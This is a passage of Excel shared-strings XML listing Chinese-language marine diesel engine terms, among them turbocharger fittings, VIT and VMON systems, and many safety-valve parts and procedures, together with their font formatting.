      </rPr>
      <t>)</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>TC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发货型式</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>TC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进口绝缘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>TC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旁通布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>TC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>切断控制系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>TDC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>指示器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>TSA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>箱托架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形插块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形接头，内</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外螺纹</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形接头，外螺纹</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形手柄</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形手柄六角形键槽</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形手柄套筒扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型弯头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>UG-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>父类</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>_</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管理</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>_</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>UG</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基本气缸体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>UIT</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统规格</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>U</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形销规</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>VDR</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>VISCOTHERM</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>出口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>VISCOTHERM</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>VIT</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿条拉出工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>VIT</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制单元装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>VIT</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">VMON </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统，文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>VMON</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>VMON</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>VOC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀测试工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>VOC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>块用千斤顶</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>VOC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>块用支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>VOC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力测试</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>VOC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用接管和插头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>VT</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设备布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>V</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>V</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型电站</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>V</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型夹子</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>w</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>槽型盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>X</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>光检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>X-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>Y56</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷凝管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阿尔法离合器安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阿尔法离合器装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全包</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全标识</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全带</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全吊钩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>污油盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀保养程序</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀保养规程</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备件清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀测试设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀抽出装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀单元安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀吊具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀功能测试生产说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀检查和调整</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀开口压力检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀壳体支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀试验台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀试验装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀锁紧螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全盖布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全钩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全规范</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全和收集器块液压</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全回转设备布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全控制系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全块布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全帽</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全帽盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全设备</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全设备工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全视频说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全停车，定距浆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> 26-46MC/MC-C</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全系统报警仪表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全系统附件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全系统要求</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全蓄压器壳体布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全预防措施</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全预警工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全载重负荷标记</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全装置，活塞杆螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维修指南</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
